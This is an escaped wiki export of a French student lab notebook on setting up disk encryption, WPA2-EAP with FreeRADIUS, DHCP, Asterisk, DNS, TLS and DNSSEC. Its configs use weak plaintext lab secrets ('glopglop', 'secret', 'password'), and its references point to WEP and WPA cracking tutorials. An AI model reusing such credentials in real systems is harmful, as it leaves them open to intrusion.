Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement.&lt;br /&gt;
[[Fichier:Connexioniphone.JPG|thumb|center|Connexion via smartphone]]&lt;br /&gt;
&lt;br /&gt;
==== Configuration et utilisation du PCBX ====&lt;br /&gt;
&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=JulienJoignaux&lt;br /&gt;
username=jjoignaux&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&lt;br /&gt;
&lt;br /&gt;
[6002]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=LoicDelecroix&lt;br /&gt;
username=ldelecro&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions le fichier extensions.conf&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:voipjjld.jpg|thumb|center|Appel entre 2 smartphones]]&lt;br /&gt;
&lt;br /&gt;
== Références ==&lt;br /&gt;
&lt;br /&gt;
* Crackage de la clef WEP : [http://wiki.backtrack-fr.net/index.php/Casser_une_cl%C3%A9_wep/wpa_avec_la_suite_Aircrack-ng]&lt;br /&gt;
* Cassage de mot de passe WPA-PSK : [http://www.crack-wifi.com/tutoriel-crack-wpa.php]&lt;br /&gt;
* Cryptage de données : [https://doc.ubuntu-fr.org/cryptsetup]&lt;br /&gt;
* DHCP : [https://doc.ubuntu-fr.org/isc-dhcp-server]&lt;br /&gt;
* Asterisk : [http://denisrosenkranz.com/tuto-installer-et-configurer-asterisk-sous-debian-6-et-ubuntu/]&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46349</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46349"/>
				<updated>2017-11-17T13:54:52Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
ssh username@weppes&lt;br /&gt;
ssh root@193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
